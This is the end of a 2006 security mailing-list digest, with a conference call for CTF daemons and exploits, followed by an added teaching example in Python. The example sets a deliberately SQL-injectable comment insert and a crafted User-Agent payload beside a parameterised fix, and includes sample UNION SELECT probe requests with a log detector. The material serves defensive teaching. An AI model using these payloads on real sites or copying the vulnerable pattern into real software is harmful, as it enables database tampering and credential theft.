* Time (45-60 minutes including time for discussion and questions)
* Technical requirements (video, internet, wireless, audio, etc.)

Each non-resident speaker will receive accommodation for 3 nights at
The Westin Kuala Lumpur. For each non-resident speaker, HITB will cover
travel expenses (through our airline partner, Malaysia Airlines) up to
USD 1,000.00.

HITBSecConf2006 CTF Daemons/Flags

As part of our annual conference, HITB organizes an attack and defense
"hack-game" commonly referred to as *Capture The Flag* or CTF. As part
of our continued efforts to improve on the game and raise the bar each
year, we are inviting speakers to contribute a daemon and exploit for
this year's CTF competition. For further details on the submission
process, kindly e-mail dinesh -at- hackinthebox.org or
ctfinfo -at- hackinthebox.org.

On behalf of The HITB Team, we thank you and look forward to receiving
your submissions! See you guys in September!

HITBSecConf2006 - Malaysia: Deep-Knowledge Network Security
http://conference.hackinthebox.org/hitbsecconf2006kl/
http://conference.hitb.org/hitbsecconf2006kl/

------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

End of Full-Disclosure Digest, Vol 13, Issue 8
**********************************************
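Two of the messages in this digest are SQL injection reports: GLSA 200603-01 (message 4), where a User Agent header was pasted unfiltered into a comment-posting query, and the TotalECommerce advisory (message 5), whose example requests put a negative id followed by UNION SELECT into the id parameter. The following is an added example written for this archive page; it is not code from WordPress, TotalECommerce, Gentoo or any of the posters. Part 1 shows the injection pattern from message 4 beside its parameterised fix on a constructed comments table (the schema, the column names and the crafted User Agent value are assumptions, not WordPress's). Part 2 is a small log check for the request shape in message 5, run over constructed Common Log Format lines that are not real traffic.

```python
"""SQL injection: vulnerable/parameterised pair, plus a log check for UNION probes."""
import re
import sqlite3
from urllib.parse import parse_qsl, urlsplit

# ---- Part 1: user-controlled header pasted into SQL (pattern from GLSA 200603-01) ----

# Constructed schema; it is an assumption, not the real WordPress comments table.
SCHEMA = """
CREATE TABLE comments (
    id         INTEGER PRIMARY KEY,
    author     TEXT NOT NULL,
    content    TEXT NOT NULL,
    user_agent TEXT NOT NULL,
    approved   INTEGER NOT NULL DEFAULT 0   -- 0 = waiting for moderation
)
"""

# Constructed User-Agent value: it closes the string literal and the VALUES
# list early, then comments out the remainder of the statement.
CRAFTED_USER_AGENT = "Mozilla', 1) -- "


def insert_comment_vulnerable(conn, author, content, user_agent):
    """Builds the INSERT by string formatting, so any quote inside the
    header changes the statement's structure (the message 4 pattern)."""
    sql = ("INSERT INTO comments (author, content, user_agent, approved) "
           f"VALUES ('{author}', '{content}', '{user_agent}', 0)")
    conn.execute(sql)


def insert_comment_safe(conn, author, content, user_agent):
    """Same insert with bound parameters: the header is data, never SQL."""
    conn.execute(
        "INSERT INTO comments (author, content, user_agent, approved) "
        "VALUES (?, ?, ?, 0)",
        (author, content, user_agent),
    )


def run_comment_demo():
    """Runs both variants on in-memory SQLite and reports what each stored."""
    results = {}
    for label, insert in (("vulnerable", insert_comment_vulnerable),
                          ("safe", insert_comment_safe)):
        conn = sqlite3.connect(":memory:")
        conn.execute(SCHEMA)
        insert(conn, "alice", "nice post", CRAFTED_USER_AGENT)
        user_agent, approved = conn.execute(
            "SELECT user_agent, approved FROM comments").fetchone()
        results[label] = {"user_agent": user_agent, "approved": approved}
        conn.close()
    return results


# ---- Part 2: spotting UNION-based probes in web server logs (message 5 shape) ----

# Matches after URL decoding, so "+" and "%20" encodings are both covered.
UNION_PATTERN = re.compile(r"\bunion\b\s+(all\s+)?select\b", re.IGNORECASE)

# Constructed Common Log Format lines (not real traffic); the hostnames and
# addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2006:04:36:01 +0200] "GET /shop/index.asp?secao=25&id=7 HTTP/1.1" 200 5120
203.0.113.9 - - [04/Mar/2006:04:36:02 +0200] "GET /shop/index.asp?secao=25&id=-1+UNION+select+login,login+from+administradores HTTP/1.1" 200 5301
203.0.113.9 - - [04/Mar/2006:04:36:03 +0200] "GET /shop/index.asp?secao=25&id=-1%20UNION%20ALL%20SELECT%20senha%20from%20administradores HTTP/1.1" 500 912
198.51.100.2 - - [04/Mar/2006:04:37:10 +0200] "GET /blog/?s=trade+union+meeting HTTP/1.1" 200 2200
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def find_union_probes(log_text):
    """Return (client, path, parameter, decoded value) for every request whose
    query parameter contains UNION ... SELECT once URL decoding is undone."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        client, _ts, _method, target, _status = m.groups()
        parts = urlsplit(target)
        # parse_qsl decodes "+" and "%XX" for us, one parameter at a time
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if UNION_PATTERN.search(value):
                hits.append((client, parts.path, name, value))
    return hits


if __name__ == "__main__":
    for label, row in run_comment_demo().items():
        print(f"{label:10s} stored user_agent={row['user_agent']!r} approved={row['approved']}")
    for client, path, name, value in find_union_probes(SAMPLE_LOG):
        print(f"probe from {client} on {path}: {name}={value!r}")
```

The vulnerable variant stores the truncated User Agent and an approved flag of 1, because the crafted value rewrote the statement; the parameterised variant stores the crafted string verbatim with approved still 0, which is the whole point of binding instead of formatting. The log check decodes each parameter before matching, since the advisory's examples use "+" for spaces and a second probe could just as well use "%20"; the pattern is deliberately narrow (UNION followed by SELECT) so a benign phrase such as "trade union meeting" does not fire.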